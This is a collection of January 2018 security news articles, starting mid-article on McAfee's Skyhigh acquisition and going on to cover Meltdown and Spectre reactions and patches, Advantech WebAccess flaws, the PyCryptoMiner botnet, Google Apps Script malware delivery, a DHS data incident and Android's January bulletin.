The Skyhigh solution offers three primary aspects to cloud security: visibility into the cloud; control over interaction with the cloud; and greater awareness of and solutions to the threats inherent in moving into public cloud. "At the highest level," he said, "a big part of the cloud problem is just awareness of what Shadow IT services an organization is using. More often than not, people are not using shadow IT because they are malicious, but rather because it they have found a more efficient way for them to get their job done.

"Skyhigh," he continued, "can identify the use of Shadow IT so that an organization can determine whether it's an approved and sanctioned use of cloud capabilities, and take appropriate action." This is useful. Employees can sometimes find a better solution to their work requirements than is currently available from the IT department. Simply banning Shadow IT probably would not work, but would certainly have a negative effect on employee initiative and productivity. Knowing what is being used allows the security team to analyze the risk and determine whether and to what extent a newly used cloud application should be allowed within the enterprise.

The second aspect, he continued, "is about controlling and managing access, content and methodologies for cloud services. That's either through proxies or through native cloud APIs that provide better visibility into the way that users are accessing these services." He gave the example of moving from on-prem Exchange to cloud Office 365, where the organization will need to ensure that sensitive information isn't flowing to places it shouldn't.

"The organization might want to have different policies for what users can do when they access the cloud based on different access scenarios. For example, if employees are using a managed corporate laptop, they might have unrestricted access to O365 where they can download documents with the full versions of Word or Excel. But if they are accessing their account through their personal phone there might be a policy setting that would restrict them to only using the web interface; or requiring that if they download a document, it is wrapped in an enterprise or digital rights management control. Being able to control how the cloud is used makes it possible to minimize risk."

The third element is in identifying and solving the new risks that come with moving to the cloud. "When organizations move to the cloud, they need to be aware of all sorts of new risks that a CASB solution is able to monitor, detect and alert on," he said. He gave AWS S3 misconfigurations as an example. "There have been numerous data breaches recently involving the misconfiguration of access controls in public cloud storage. Users have inadvertently given world read access to an Amazon S3 bucket, giving anyone access to what should be protected data." Examples include the exposure of tens of thousands of potentially sensitive government files disclosed in June 2017; the personal details of 198 million American voters also disclosed in June 2017; and millions of Dow Jones customer details exposed in July 2017.

What really excites Grobman about the Skyhigh acquisition is the ability to combine and integrate visibility into cloud threats with McAfee's existing visibility into on-premise threats.

"A large part of threat detection today is not in identifying a threat from just one event, but understanding threats from multiple events chained together," Grobman said. "In order to do this effectively, you need to have visibility into events from many different sources, including both the cloud and on-prem corporate devices. This is one reason why the Skyhigh acquisition makes a lot of sense for McAfee -- it is the aggregation of looking at the information coming from both the cloud computing element of the organization as well as traditional computing resources. When you put these together you can identify a lot of threats that would be difficult to detect individually."

Now the acquisition is complete, Grobman explained that Skyhigh will largely exist as its own division within McAfee. "Rajiv Gupta, the founder and CEO of Skyhigh, will join McAfee CEO Chris Young's staff and drive the product line as its own business unit. There are a few exceptions related to back office functions, like finance and HR," he added, "but for the most part, the initial approach is for Skyhigh to be its own business unit."

The definitive roadmap for things like branding are still being investigated. For the moment, the official McAfee announcement describes Skyhigh as "now part of the new cloud security business unit, led by Rajiv Gupta, former Skyhigh Networks chief executive officer."

"What we're concentrating on," said Grobman, "is really building on the synergies that Skyhigh will bring to our environment; taking McAfee's world class protection technology and integrating that into Skyhigh -- being able to look at event data from both cloud sources and traditional computing and have those work together in order to give our customers a better ability to detect threats within their infrastructure. So although the Skyhigh business will be a separate business unit within McAfee, there will be lots of work to maximize the value of the solution the system can bring to both existing and new customers."

And that, of course, is another offering from the acquisition. The CASB market is still a rapidly growing and emerging area. "There are still many customers that have yet to deploy a CASB solution," said Grobman. "We are very much looking forward to the opportunity to present this technology solution -- especially in the context of McAfee's other technology -- to organizations that are not yet McAfee customers."


Industry Reactions to Meltdown, Spectre Attacks: Feedback Friday
5.1.2018 securityweek
Attack
Researchers disclosed this week the details of two new attack methods allowing malicious actors to gain access to sensitive information stored in a device’s memory by exploiting security holes in Intel, AMD and ARM processors.

The attacks, known as Spectre and Meltdown, have already been addressed by several vendors, including Microsoft, Apple and Google, and Intel and others are also working on rolling out patches.

Billions of PCs, mobile devices and cloud instances are vulnerable to attacks leveraging the Spectre and Meltdown vulnerabilities, and some fear we will soon witness remote exploitation attempts.

Experts comment on the Meltdown and Spectre vulnerabilities

Industry professionals have commented on various aspects of Meltdown and Spectre, including their impact, what users and organizations need to do, and the lessons that can be learned.

And the feedback begins…

Sam Curry, Chief Security Officer, Cybereason:

“The recent revelation of a major chip design security flaw is quite technical and gets to the underlying architecture and interface of physical memory and virtual memory, which is a big part of all practical, modern computing. It’s important to note that no one is immune by default to this chip design flaw and that it may impact a wider set of chips and manufacturers over time. In trying to find ways of improving overall security in memory management, researchers have uncovered a very long running set of flaws that could mean the ability to exploit a lot of systems very deeply.

This is so fundamental that it’s likely they knew about the flaw, so it’s going to be important to watch how they handle the situation and how the narrative and history unfold. The chip vendors are playing this calmly, but this is likely the calm before the storm. It's too early to point fingers yet, but eyes are on the entire chip industry now. Also in spite of the early attention on Intel, this class of threats effects other chip sets. Now is the time for everyone in the chip game to take care of their own business. No excuses.”

Michael Daly, CTO, Cybersecurity & Special Missions, Raytheon:

“The Intel vulnerability reinforces the need for everyone to stay on top of the latest patches. We learned that hard lesson with the Wannacry attack that quickly spread to 150 countries.

In this case, the most immediate and significant risk exists in the cloud services provider environments and in private data centers. The threat seems to be the grabbing of passwords/hash-values and encryption keys from memory and then using these to install additional malware.

Until these systems can all be patched, it will be even more important to watch for unauthorized processes (applications) and other evidence of tampering, such as increased processor usage and file drops. When the patches are issued, their deployment should be prioritized because criminals and nation-state adversaries apparently have had a couple of months head start.”

Ryan Kalember, SVP, Cybersecurity Strategy, Proofpoint:

“Like most organizations, chip manufacturers have long prioritized speed over security—and that has led to a tremendous amount of sensitive data placed at risk of unauthorized access via Meltdown and Spectre. While the vast majority of computing devices are impacted by these flaws, the sky is not falling. Both vulnerabilities require an attacker to be able to run their code on the device they are attacking. The typical consumer is still vastly more likely to be targeted by something like a phishing email than a targeted attack exploiting Meltdown or Spectre. However, these vulnerabilities break down some of the most fundamental barriers computers use to keep data safe, so cloud providers need to act quickly to ensure that unauthorized access, which would be very difficult to detect, does not occur.

If there is some good news, it’s fortunate that these vulnerabilities were discovered and responsibly disclosed by respected researchers as opposed to being exploited in a large scale, potentially-damaging global attack.”

Bryce Boland, Asia Pacific Chief Technology Officer, FireEye:

“Vulnerabilities like this are extremely problematic because they permeate so much of the technology around us that we all rely upon. Resolving this issue will take time and incur costs. In many cases, this cost includes security risks, rectification effort and even computing performance.

These vulnerabilities can have big implications. Many services can be exposed and affected. Hardware vendors will address the underlying design issue, though vulnerable systems will likely remain in operation for decades. In the meantime, software vendors are releasing patches to prevent attackers from exploiting these vulnerabilities. This will also impact system performance which may have a cumulative effect in data centers for anyone using cloud services and the internet.

Large organizations will need to make a risk management decision as to how quickly they update their systems, as this can be disruptive and costly.

We are yet to understand the full impact of this development, and not all details are available. At this stage, exploitable code is not publicly available. Nation state hackers typically use these types of vulnerabilities to develop new attack tools, and that's likely in this case.”

Christian Vezina, Chief Information Security Officer, VASCO Data Security:

“What I find interesting is that with the ever increasing amount of software code of out there, security researchers are still discovering 20+ years old vulnerabilities. Unfortunately the processor level vulnerabilities that have been published recently seem to indicate a trend: Everyone drop what you are doing and start patching your systems [again].”

Ben Carr, Vice President of Strategy, Cyberbit:

“Vulnerabilities like Meltdown only highlight the breadth of the potential issue we face no matter the investment. Meltdown potentially affects Intel processors going back to 1995. While many are rushing to find a fix after the disclosure, one must admit that this is why nation state actors don’t really have to try that hard to find a way in. At its core, it just isn’t that difficult.

In the cybersecurity industry, we must realize that we have maxed out on our ability to lock down systems and networks. It has become critical that we look to ways not only to prevent but to defend.”

Michael Lines, VP of strategy, risk and compliance, Optiv:

“The Meltdown and Spectre security flaws are affecting billions of devices, but the fundamental challenges that organizations face remain the same as every other major vulnerability that has been announced. Fixing these security flaws is going to be a long-term issue to resolve because, one, patches are needed across a vast array of operating systems, and two, patches for Spectre are still to be developed and released.

These widespread vulnerabilities underscore the importance of having ongoing risk assessment processes in place, as well as well-oiled TVM processes – both as part of a robust information security program. Risk assessment should cover both awareness and management of the issue at the board and C-suite level. These flaws are going to bring a lot of ‘doom and gloom,’ but organizations’ ability to react in an efficient and predictable way is what is most critical. Don’t panic, prepare a rational plan based on patch availability and system sensitivity, execute your plan, and monitor progress.”

Prof. Yehuda Lindell, chief scientist and co-founder, Dyadic:

“The important take-away from these attacks is very simple - computation leaks secrets! There has been a huge body of work showing that secret cryptographic keys and private information can be stolen by running software on the same machine and utilizing the properties of modern complex processors that don’t provide true separation between processes. In the past it has been shown how the machine's cache and even clock can be used by one process to steal secrets from another. Meltdown and Spectre go a step further by utilizing the way that modern processors achieve speedups through something called “speculative execution”.

As a result, if you are computing on private information or carrying out cryptographic operations on a machine, and an attacker can run code on the same machine, then you are not safe. This includes the case that an attacker breaches your network, but is primarily of relevance in cloud environments where by definition different customers run their applications on the same machine.”

Jeff Tang, Senior Security Researcher, Cylance:

“The biggest impact is for companies relying on shared computing resources in the cloud - such as virtual private servers, virtual machines, and containers - which place them at higher risk of an attacker employing these new techniques to extract secrets (passwords, encryption keys, and other sensitive data). Administrators should check with their hosting provider to determine the appropriate steps to deploy mitigations which may include applying software updates and rebooting the virtual machine.

Administrators should prioritize patch testing and validation of the newly released Microsoft security update and deploy them to shared workstations and hypervisor based systems which are at higher risk of being targeted by attackers hoping to maximize their impact.”

Joseph Carson, Chief Security Scientist, Thycotic:

“The latest Intel, ARM and AMD chip security flaw is a major issue for multiple reasons, the security risk has the potential for simple code running in a web browser. This could allow for a cybercriminal to access sensitive data in protected memory which could include passwords, login keys or sensitive data that is typically protected. The patch of such a flaw is a major challenge as a firmware update typically requires a reboot so for servers running critical systems, this results in unplanned downtime. With the fix having a potential performance impact of up to 30%, this means critical systems already running at full power could require costly upgrades to ensure operational stability.

With these cyber risks, it means that most companies will approach patching systems with extreme caution as many companies still prioritise business operations over security issues. The impact for many companies not having the systems operational is sometimes greater than the risk of a cyberattack but cyberattacks do not come cheap either as seen with cyberattacks like WannaCry and NotPetya in 2017 costing some companies up to 300 million USD. The systems at higher risk are those that are internet connected, meaning they are easily accessible by cybercriminals and those systems used by employees, who regularly use them for browsing the internet, so these systems should be the priority for any organisation that takes cybersecurity seriously.”


Ubuntu Preps Patches for Meltdown, Spectre CPU Flaws
5.1.2018 securityweek
Vulnerebility
Ubuntu security updates planned for January 9 will patch the recently disclosed Meltdown and Spectre CPU vulnerabilties, Canonical has announced.

Impacting billions of devices around the world, Meltdown and Spectre are two new side-channel attacks targeting CPUs from Intel, AMD and ARM. Residing in the CPU architecture, the flaws impact Windows, MacOS, Linux, and many other operating systems.

The attacks abuse three different flaws and can be leveraged to bypass memory isolation and access sensitive data such as passwords, photos, documents, and emails.

Experts are warning of the risk of remote exploitation of Spectre vulnerabilities in targeted or mass attacks and tech companies such as Microsoft, Google, Apple, and others have already revealed plans to address the issues in their products.

On Thursday, Intel announced patches for its CPUs, saying it would address the bugs in 90% of the CPUs produced over the past five years.

Intel is said to have been aware of the vulnerabilities since April 2017, and other companies were informed on the matter a while ago as well, including Canonical, which has been working on fixes for the past couple of months.

According to the company, “essentially every operating system, hardware, and cloud vendor in the world” agreed to a coordinated release date of January 9, 2018, but the news on Meltdown and Spectre broke earlier. However, patches for Ubuntu won’t be available until the planned release date.

“By design, operating system updates would be available at the same time as the public disclosure of the security vulnerability. While it happens rarely, this an industry standard best practice, which has broken down in this case,” Canonical explains.

Ubuntu 64-bit x86 (aka, amd64) should receive updated kernels by Jan 9, or sooner if possible. The updates will be released for Ubuntu 17.10 (Artful) — Linux 4.13 HWE; Ubuntu 16.04 LTS (Xenial) — Linux 4.4 (and 4.4 HWE); Ubuntu 14.04 LTS (Trusty) — Linux 3.13; and Ubuntu 12.04 ESM (Precise) — Linux 3.2 (an Ubuntu Advantage license is required for the 12.04 ESM kernel update).

In April, Ubuntu 18.04 LTS (Bionic) will ship with a 4.15 kernel, which includes the KPTI patchset as integrated upstream, the company says.

“Ubuntu optimized kernels for the Amazon, Google, and Microsoft public clouds are also covered by these updates, as well as the rest of Canonical’s Certified Public Clouds including Oracle, OVH, Rackspace, IBM Cloud, Joyent, and Dimension Data,” Canonical explains.

The company also warns that a reboot will be required to activate the update, as the kernel fixes are not Livepatch-able. The update includes “hundreds of independent patches, touching hundreds of files and thousands of lines of code,” and the complexity of the patchset is not compatible with the Linux kernel Livepatch mechanism.


Several Vulnerabilities Patched in Advantech WebAccess
5.1.2018 securityweek
Vulnerebility
Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address several vulnerabilities, including ones rated high severity.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. According to ICS-CERT, the product is used in the United States, Europe and East Asia in sectors such as critical manufacturing, energy, and water and wastewater.

Researchers have once again found several vulnerabilities in this HMI/SCADA product. One of the most serious, based on its CVSS score of 8.2, is CVE-2017-16724, which has been described as a stack-based buffer overflow. These types of security holes typically allow an attacker to crash the application and possibly even execute arbitrary code.

The identifier CVE-2017-16728 has been assigned to several untrusted pointer dereference vulnerabilities that can be exploited to cause the application to crash.

Experts also identified a path traversal flaw that can be exploited to access files on the targeted device (CVE-2017-16720), and a SQL injection vulnerability caused by the lack of proper sanitization of user input (CVE-2017-16716).

The least serious weakness, classified as medium severity, allows an attacker to crash the application using specially crafted inputs.

The vulnerabilities have been patched by Advantech with the release of WebAccess 8.3. The vendor says all prior versions are affected.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better compared to many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, which was roughly half the number published in the previous year.

Several of the flaws were reported through ZDI by researchers Steven Seeley, Zhou Yu and Andrea Micalizzi. ZDI has prepared advisories for the vulnerabilities, but it has yet to make them public. The list of experts credited by ICS-CERT for finding the flaws also includes Michael Deplante.

Seeley was also credited for finding two remote code execution vulnerabilities in Advantech WebAccess in November.


PyCryptoMiner botnet, a new Crypto-Miner Botnet spreads over SSH
5.1.2017 securityaffairs BotNet

Security experts at F5 discovered a new Linux Monero crypto-miner botnet dubbed PyCryptoMiner spreading over the SSH protocol.
F5 researchers discovered a new Linux crypto-miner botnet dubbed PyCryptoMiner spreading over the SSH protocol. The Monero miner botnet is based on the Python scripting language, it leverages Pastebin as command and control server infrastructure when the original C&C isn’t available.

If all C&C servers of the botnet are not accessible, all newly infected bots are idle, polling for the botmaster’s Pastebin page.

The experts believe the botnet it under development, operators have recently added scanner functionality hunting for vulnerable JBoss servers (exploiting CVE-2017-12149).

It has been estimated that the PyCryptoMiner botnet has generated the equivalent of approximately $46,000 as of late December.

The experts believe the PyCryptoMiner botnet is more evasive due to its scripting language-based nature, it is hard to detect because it is executed by a legitimate binary.

The malware spreads by attempting to guess the SSH login credentials of target Linux systems. Once SSH credentials are guessed, the bot deploys a simple base64-encoded Python script designed to connect to the C&C server to download and execute additional Python code.

The second-stage code is the controller that registers a cron job on the infected machine to gain persistence.

The original script checks whether the machine has been already infected, it also collects information on the infected device including:

Host/DNS name
OS name and its architecture
Number of CPUs
CPU usage
The bot sends a report with the collected information to the C&C that in turn send it task details. The “task” includes:

“cmd” — arbitrary command to be executed as a separate process
“client_version” — if the version number received from the server is different from the current bot version, it will terminate the bot and wait for the cron to run the spearhead script again to deploy an updated version (current value is “4”)
“task_hash” — task identifier so the C&C can synchronize botnet results, because each command has a different execution time
“conn_cycler” — time interval to poll the C&C, which is controlled by the bot master, probably to balance the loads on its C&C infrastructure as the botnet grows (default value 15 seconds)
The PyCryptoMiner botnet uses two pool addresses that show approximately 94 and 64 Monero, with a value of around $60,000. However, it is not possible to know overall profits of the botnet.

The analysis of the Pastebin page used are alternative C&C revealed the botnet might have been active since August 2017, and that the content had been viewed 177,987 times at the time of the investigation. It is not possible to determine the overall size of the botnet because each bot could periodically visit the page when the C&C server is down.

The botmaster used the moniker “WHATHAPPEN” which is associated with more than 36,000 domains and 235 email addresses. The registrant has been involved in scams, gambling, and adult services since 2012.

Below F5’s key findings on the PyCryptoMiner botnet:

Is based on the Python scripting language making it hard to detect
Leverages Pastebin.com (under the username “WHATHAPPEN”) to receive new command and control server (C&C) assignments if the original server becomes unreachable
The registrant is associated with more than 36,000 domains, some of which have been known for scams, gambling, and adult services since 2012
Is mining Monero, a highly anonymous crypto-currency favored by cyber-criminals. As of late December 2017, this botnet has made approximately US $46,000 mining Monero
New scanner functionality hunting for vulnerable JBoss servers was introduced mid-December exploiting CVE-2017-12149
F5 also published IoCs for the botnet.


[Guide] How to Protect Your Devices Against Meltdown and Spectre Attacks
5.1.2017 thehackernews 
Attack


Recently uncovered two huge processor vulnerabilities called Meltdown and Spectre have taken the whole world by storm, while vendors are rushing out to patch the vulnerabilities in its products.
The issues apply to all modern processors and affect nearly all operating systems (Windows, Linux, Android, iOS, macOS, FreeBSD, and more), smartphones and other computing devices made in the past 20 years.
What are Spectre and Meltdown?
We have explained both, Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753, CVE-2017-5715), exploitation techniques in our previous article.
In short, Spectre and Meltdown are the names of security vulnerabilities found in many processors from Intel, ARM and AMD that could allow attackers to steal your passwords, encryption keys and other private information.
Both attacks abuse 'speculative execution' to access privileged memory—including those allocated for the kernel—from a low privileged user process like a malicious app running on a device, allowing attackers to steal passwords, login keys, and other valuable information.
Protect Against Meltdown and Spectre CPU Flaws
Some, including US-CERT, have suggested the only true patch for these issues is for chips to be replaced, but this solution seems to be impractical for the general user and most companies.
Vendors have made significant progress in rolling out fixes and firmware updates. While the Meltdown flaw has already been patched by most companies like Microsoft, Apple and Google, Spectre is not easy to patch and will haunt people for quite some time.
Here's the list of available patches from major tech manufacturers:
Windows OS (7/8/10) and Microsoft Edge/IE
Microsoft has already released an out-of-band security update (KB4056892) for Windows 10 to address the Meltdown issue and will be releasing patches for Windows 7 and Windows 8 on January 9th.
But if you are running a third-party antivirus software then it is possible your system won’t install patches automatically. So, if you are having trouble installing the automatic security update, turn off your antivirus and use Windows Defender or Microsoft Security Essentials.
"The compatibility issue is caused when antivirus applications make unsupported calls into Windows kernel memory," Microsoft noted in a blog post. "These calls may cause stop errors (also known as blue screen errors) that make the device unable to boot."
Apple macOS, iOS, tvOS, and Safari Browser
Apple noted in its advisory, "All Mac systems and iOS devices are affected, but there are no known exploits impacting customers at this time."
To help defend against the Meltdown attacks, Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2, has planned to release mitigations in Safari to help defend against Spectre in the coming days.
Android OS
Android users running the most recent version of the mobile operating system released on January 5 as part of the Android January security patch update are protected, according to Google.
So, if you own a Google-branded phone, like Nexus or Pixel, your phone will either automatically download the update, or you'll simply need to install it. However, other Android users have to wait for their device manufacturers to release a compatible security update.
The tech giant also noted that it's unaware of any successful exploitation of either Meltdown or Spectre on ARM-based Android devices.
Firefox Web Browser
Mozilla has released Firefox version 57.0.4 which includes mitigations for both Meltdown and Spectre timing attacks. So users are advised to update their installations as soon as possible.
"Since this new class of attacks involves measuring precise time intervals, as a partial, short-term mitigation we are disabling or reducing the precision of several time sources in Firefox," Mozilla software engineer Luke Wagner wrote in a blog post.
Google Chrome Web Browser
Google has scheduled the patches for Meltdown and Spectre exploits on January 23 with the release of Chrome 64, which will include mitigations to protect your desktop and smartphone from web-based attacks.
In the meantime, users can enable an experimental feature called "Site Isolation" that can offer some protection against the web-based exploits but might also cause performance problems.
"Site Isolation makes it harder for untrusted websites to access or steal information from your accounts on other websites. Websites typically cannot access each other's data inside the browser, thanks to code that enforces the Same Origin Policy." Google says.
Here's how to turn on Site Isolation:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labelled Enable.
Once done, hit Relaunch Now to relaunch your Chrome browser.
Linux Distributions
The Linux kernel developers have also released patches for the Linux kernel with releases including versions 4.14.11, 4.9.74, 4.4.109, 3.16.52, 3.18.91 and 3.2.97, which can be downloaded from Kernel.org.
VMware and Citrix
A global leader in cloud computing and virtualisation, VMware, has also released a list of its products affected by the two attacks and security updates for its ESXi, Workstation and Fusion products to patch against Meltdown attacks.
On the other hand, another popular cloud computing and virtualisation vendor Citrix did not release any security patches to address the issue. Instead, the company guided its customers and recommended them to check for any update on relevant third-party software.


Intel Patches CPUs Against Meltdown, Spectre Exploits
5.1.2018 securityweek
Exploit
Intel has been working with its partners to release software and firmware updates that should protect systems against the recently disclosed CPU attacks. The company expects patches to become available for a majority of its newer products by the end of next week.

Researchers this week disclosed the details of Spectre and Meltdown, two new side-channel attacks targeting CPUs from Intel, AMD and ARM. The attacks, which leverage three different flaws, can be used to bypass memory isolation mechanisms and gain access to sensitive data, including passwords, photos, documents, and emails. Experts have warned that malicious actors may soon start to remotely exploit the Spectre vulnerabilities in targeted or mass attacks.

AMD has insisted that there is a “near zero risk” to its customers and ARM says only a few of its Cortex processors are impacted.

Intel informed customers on Thursday that system manufacturers have been provided firmware and software updates that address Spectre and Meltdown for processors launched in the last five years – experts believe nearly every Intel processor made since 1995 is impacted. It will now be up to system manufacturers to distribute the patches.

“By the end of next week, Intel expects to have issued updates for more than 90 percent of processor products introduced within the past five years,” Intel said.

In response to concerns that mitigations for the Spectre and Meltdown vulnerabilities can introduce performance penalties of as much as 30 percent, Intel pointed out that average users will not notice any difference.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact,” Intel said.

The company cited Apple, Microsoft, Amazon and Google, all of which said the mitigations did not create any noticeable performance issues.

The best protection against these attacks is the use of kernel page table isolation (KPTI), a hardening technique designed by a team of researchers at the Graz University of Technology in Austria to isolate kernel space from user space memory. Google, whose researchers independently found the flaws, also developed a novel mitigation named Retpoline.

Microsoft, Apple, Google, Red Hat, VMware and other major tech firms have already started releasing software updates and workarounds to resolve the vulnerabilities.

Intel was hit the hardest by Spectre and Meltdown and the company’s stock lost 6 percent in value shortly after the disclosure. The company’s CEO, Brian Krzanich, sold all the stock he was legally allowed to, worth roughly $24 million, just before the news broke, which has raised insider trading concerns. Intel claims Krzanich had been planning on selling stock for months, but Intel has reportedly known about the vulnerabilities since April 2017.


Google Apps Script Allowed Hackers to Automate Malware Downloads
5.1.2018 securityweek
Virus
Researchers at Proofpoint discovered recently that Google Apps Script could have been abused by malicious hackers to automatically download malware hosted on Google Drive to targeted devices.

Google Apps Script is a JavaScript-based scripting language that allows developers to build web applications and automate tasks. Experts noticed that the service could have been leveraged to deliver malware by using simple triggers, such as onOpen or onEdit.

In an attack scenario described by Proofpoint, attackers uploaded a piece of malware to Google Drive and created a public link to it. They then used Google Docs to send the link to the targeted users. Once victims attempted to edit the Google Docs file, the Apps Script triggers would cause the malware to be automatically downloaded to their devices. Researchers said attackers could have used social engineering to convince the target to execute the malware.

Google has implemented new restrictions for simple triggers in an effort to block malware and phishing attacks triggered by opening a document.

While there is no evidence that this method has been exploited in the wild, malicious actors abusing Google Apps Script is not unheard of. A cybercrime group using the infamous Carbanak malware at one point leveraged the service for command and control (C&C) communications.

“SaaS platforms remain a ‘Wild West’ for threat actors and defenders alike. New tools like Google Apps Script are rapidly adding functionality while threat actors look for novel ways of abusing these platforms. At the same time, few tools exist that can detect threats generated by or distributed via legitimate software-as-a-service (SaaS) platforms,” explained Maor Bin, security research lead of Threat Systems Products at Proofpoint.

“This creates considerable opportunities for threat actors who can leverage newfound vulnerabilities or use ‘good for bad’: making use of legitimate features for malicious purposes,” he added.

A few months ago, Google announced the introduction of new warnings for potentially risky web apps and Apps Scripts.


247,000 DHS current and former federal employees affected by a privacy incident
4.1.2017 securityaffairs Incindent

A privacy incident suffered by the Department of Homeland Security (DHS) exposed data related to 247,167 current and former federal employees.
A data breach suffered by the Department of Homeland Security exposed data related to 247,167 current and former federal employees that were employed by the Agency in 2014.

The data breach affected a database used by the DHS Office of the Inspector General (OIG) that was stored in the Department of Homeland Security OIG Case Management System.

“On January 3, 2018, select DHS employees received notification letters that they may have been impacted by a privacy incident related to the DHS Office of Inspector General (OIG) Case Management System. The privacy incident did not stem from a cyber-attack by external actors, and the evidence indicates that affected individual’s personal information was not the primary target of the unauthorized transfer of data.” reads the announcement published by the DHS.

Exposed data includes employee names, Social Security numbers, birth dates, positions, grades, and duty stations.

The incident also affected a second group of individuals (i.e., subjects, witnesses, and complainants) associated with Department of Homeland Security OIG investigations from 2002 through 2014 (the “Investigative Data”).

The data leak was the result of an unauthorized copy of the DHS OIG investigative case management system that was in the possession of a former DHS OIG employee.

The copy was discovered as part of an ongoing criminal investigation being conducted by Department of Homeland Security OIG and the U.S. Attorney’s Office

The data breach was discovered on May 10, 2017, as part of an ongoing criminal investigation conducted by OIG and the U.S. Attorney’s Office.

The Department of Homeland Security sent notification letters to affected individuals, it is also implementing additional security measured to limit access to such kind of information.

All individuals potentially affected by the incident are being offered 18 months of free credit monitoring and identity protection services.

“Department of Homeland Security is implementing additional security precautions to limit which individuals have access to this information and will better identify unusual access patterns. ” continues the Department of Homeland Security.

“We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network,”


Android Security Bulletin for January 2018, tech giant fixes multiple Critical flaws
4.1.2017 securityaffairs Android

Google patched five Critical bugs and 33 High severity flaws as part of the Android Security Bulletin for January 2018.
The tech giant addressed 38 Android security vulnerabilities, 20 as part of the 2018-01-01 security patch level and 18 in the 2018-01-05 security patch level.

The 2018-01-01 security patch level fixed four Critical remote code execution issue and 16 High risk elevation of privilege and denial of service flaws.

The most severe vulnerability in Android runtime, tracked as CVE-2017-13176, could be exploited by a remote attacker to bypass user interaction requirements in order to gain access to additional permissions.

A Critical remote code execution flaw was fixed in System, the company also addressed one High risk denial of service vulnerability and two High severity elevation of privilege vulnerabilities.

The security updates fixed 15 vulnerabilities issues in Media framework, the most severe one could be exploited by an attacker using a specially crafted malicious file to execute arbitrary code within the context of a privileged process.

The 2018-01-05 security patch level addressed just one Critical flaw in the Qualcomm components, it could allow a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

The 2018-01-05 security patch level also fixed 1 Critical issue and 6 High severity vulnerabilities in Qualcomm closed-source components.

The patch level addressed High risk elevation of privilege flaws in LG components, MediaTek components, Media framework, and NVIDIA components.

The security patch level addressed one information disclosure bug in Kernel components, and three High severity elevation of privilege.

The tech giant also fixed resolved 46 vulnerabilities in Google devices as part of the Pixel / Nexus Security Bulletin—January 2018.

High severity flaws only affected older Android versions, meanwhile, most of the issues were rated Moderate severity.

The affected components included Framework (1 vulnerability), Media framework (16 vulnerabilities), System (1 flaw), Broadcom components (1 issue), HTC components (1 flaw), Kernel components (7 bugs), MediaTek components (1 issue), and Qualcomm components (18 vulnerabilities).


Meltdown and Spectre attacks affect almost any processor, including Intel, ARM, AMD ones
4.1.2017 securityaffairs
Vulnerebility

The Meltdown and Spectre attacks could allow attackers to steal sensitive data which is currently processed on the computer.
Almost every modern processor is vulnerable to the ‘memory leaking’ flaws, this has emerged from technical analysis triggered after the announcement of vulnerabilities in Intel Chips.

White hackers from Google Project Zero have disclosed the vulnerabilities that potentially impact all major CPUs, including the ones manufactured by AMD, ARM, and Intel.

The expert devised two attacks dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

“A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.” reads the description of ‘speculative execution’ provided by Google hackers.

The experts explained that it is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound and can lead to information disclosure.

intel chip

The Meltdown Attack

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

“Meltdown is a related microarchitectural attack which exploits out-of-order execution in order to leak the target’s physical memory.” reads the paper on the Spectre attack.

“Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.”

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

Almost any computer is currently vulnerable to Meltdown attack.

The Spectre Attack

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack is hard to mitigate because it requires changes to processor architecture in order to solve it.
The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems. The Spectre attack works on almost every system, including desktops, laptops, cloud servers, as well as smartphones.

“In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.” continues the paper.

“KAISER patch, which has been widely applied as a mitigation to the Meltdown attack, does not protect against Spectre.”

The main vendors have rushed to provide security patches to protect their systems from these attacks.

Windows — Microsoft has issued an out-of-band patch update for Windows 10, the other versions will be fixed with the next Patch Tuesday planned for January 9, 2018
MacOS — Apple fixed most of these security holes in macOS High Sierra 10.13.2 last month.
Linux — Linux kernel developers have also released patches by implementing kernel page-table isolation (KPTI) to isolate kernel memory.
Android — Google has released security patches for Pixel/Nexus users as part of the Android January security patch update.


Hackers Expected to Remotely Exploit CPU Vulnerabilities
4.1.2018 securityweek
Vulnerebility

Security experts believe hackers will soon start to remotely exploit the recently disclosed vulnerabilities affecting Intel, AMD and ARM processors, if they haven’t done so already.

Researchers disclosed on Wednesday the details of Spectre and Meltdown, two new attack methods targeting CPUs. The attacks leverage three different flaws and they can be used to bypass memory isolation mechanisms and gain access to sensitive data, including passwords, photos, documents, and emails.

The affected CPUs are present in billions of products, including PCs and smartphones, and attacks can also be launched against cloud environments.

The best protection against these attacks is the use of kernel page table isolation (KPTI) and affected vendors have already started releasing patches and workarounds.

